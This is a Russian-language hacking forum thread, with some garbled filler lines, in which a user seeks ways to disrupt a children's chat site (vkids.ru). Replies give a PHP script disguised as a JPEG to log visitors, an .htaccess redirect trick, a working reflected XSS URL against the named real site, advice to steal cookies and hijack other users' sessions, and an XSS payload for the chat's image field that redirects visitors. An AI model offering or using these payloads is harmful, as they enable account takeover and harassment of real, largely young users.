outing mouting

Этот способ уже многие используют. А я все видео записать немогу. Времени нету. Это так называемый активный XSS, но с ориентиром на браузер и т.п. ограничения. Вообщем - не панацея.
А так - можно. Тока под браузер Ie и только если это изображение будет открыто на прямую (в адресной строке - полный путь до изображения).
Содержимое:
Обычный html с редиректом (или можешь на JS) + <iframe> на всю ширину изображения где будет путь до нормального изображения.

censored!, сто процентов уверен, что в твоем ответе есть какой то смысл... но какой то он странный :-)


<?

/**
* @filename pic.jpg
*
* делаем чето, что надо... например, записываем в БД инфу какую нить типа
*
* $ip_global = $_SERVER["REMOTE_ADDR"];
* $ip_local = $_SERVER["HTTP_X_FORWARDED_FOR"];
* $browser = $_SERVER["HTTP_USER_AGENT"];
* $referer = $_SERVER["HTTP_REFERER"];
* $query = $_SERVER['QUERY_STRING'];
*
*/

header("Content-type: image/jpg");
include './pic.jpeg';

?>


потом говоришь апачу, что надо обработать pic.jpg, как php скипт
ну и юзаешь потом, как просто снифер ;-)

но какой то он странный
а в чем его, ответа, странность? по-моему он это и имел в виду. только он хочет несколько другое:
типа послать кому-нить картинку и при ее отображении (когда она вставлена в html) произошел редирект на его страницу (скорее всего фэйковую). Вот я и ответил - так не получиться, а получиться если тока откроют набрав полный путь в строке браузера.
Просто он на форуме спрашивал как маил_ру ломануть, потом второй раз про изображения и ему похожий на твой ответ дали.

А вообще - если бы он сразу написал что он конкретно хочет, мы бы тут не гадали и не предполагали чего и как.

Как твой ответ правильный, так и мой.

Если надо чтобы отсылало делаешь вот так:

Вот это пишешь в .htaccess:


RewriteEngine On
RewriteBase /
RewriteRule ^img.gif$ /img.php [L]

Потом открываешь img.php и пишешь:

<?
header("Location: tvoy_URL");
?>


ссылка на картинку - http://tvoy_sayt.ru/img.gif

censored!, я не сказал, что твой ответ не верный, я сказал, что он "странный" :)
я просто посчитал, что он хочет данные отправить.

Zadoxlik, а вот твой ответ неверный, правда, если картинка будет в теге <img>

xPow, мой ответ - верный. Так или иначе переадрессация произойдет, просто если это будет в <img> пользователь этого не заметит.

А вот твой - неверен, т.к. переадрессации там нет, апросили ее. А говорить апачу, чтобы воспринимал файлы с расширением jpg как PHP-интерпретируемые - дурной тон.

у кого эта картинка отображается, посылало на другой сайт,

как ты видишь здесь не указано, что посылалО.
если был бы юзер, то надо было

и того . у кого эта картинка отображается, посылало на другой сайт,

согласись.

а так выходит, что ему надо вэб-снифер.

P.s. что касается дурного тона - то дурной тон, это отвечать на вопросы, которые еще не заданы.
P.p.s. и если автору правильный ответ действительно нужен - пускай уточнит вопрос.

а что касается, неверности твоего ответа, то он в том, что картинка не выведется, если только...
но об это только ты не обмовился и потому он не верный :-)

и вообще, что если на серваке НЕТ mod_rewrit'a?
что если админ ЗАПРЕТИЛ изменять конфиги сервака юзерам?

а давайте лучше дождемся автора? =)

ffffffrak

Zadoxlik а ты мне скажи это делать на любом сервере подерживающий php???

СТОООППП спорить!, В чате на vkids.ru можно послать картинку в формате jpg, вот я и решил этим воспользоваться, ведь так можно нафиг выкидовать из чата... Никто мне не помог найти дырки в этом чате, вот я и решил воспользоваться картинками).


то, что ты хочешь, у тебя не выйдет.
ну, правда, можешь айпи-шники юзвером смотреть ;-)

У меня не выйдет??, А у других выходит, меня один так послали...просто быстренько присылается что то в привате и я на другом сайте...

http://vkids.km.ru/regards.asp?vozvrat="><script>alert('xPow');</script>&type=only_nick

дальше будет. если будет необходимость ;-)

P.S. только нах тебе надо этот детский чат?

dddddddddddorememmmm g lol

дальше все стандартно: воруешь кукисы и подменяешь их на свои, что должно дать тебе возможность зайти от имени того, кому они, кукисы, принадлежат

vvvvaulya

введи это в поле картинка:
http://"><script>window.location="forum.anonymous.ru";</script>.gif

P.S. у тебя есть время пока я не напишу админу + он не залатает ;-)

pishi pishi

gdfhtyu